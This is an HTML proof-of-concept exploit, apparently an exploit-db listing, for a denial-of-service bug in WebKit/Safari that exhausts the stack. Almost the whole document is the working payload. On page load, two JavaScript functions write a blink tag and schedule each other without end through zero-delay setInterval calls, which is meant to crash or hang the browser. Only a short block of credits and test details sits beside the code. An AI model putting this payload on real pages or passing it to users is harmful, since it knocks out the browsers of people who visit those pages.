1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
<html> <script> loop1(); var a = "<blink>"; function loop1() { document.write(a); setInterval(loop2,0); } function loop2() { document.write(a); setInterval(loop1,0); } </script> <body> Webkit (Safari) Stack Exhaustion DoS Found By: Dr_IDE Credit To: Mattias Karlsson Reference: http://www.exploit-db.com/exploits/12401 Tested On: Windows 7 + Safari 4.0.5 </body> </html> |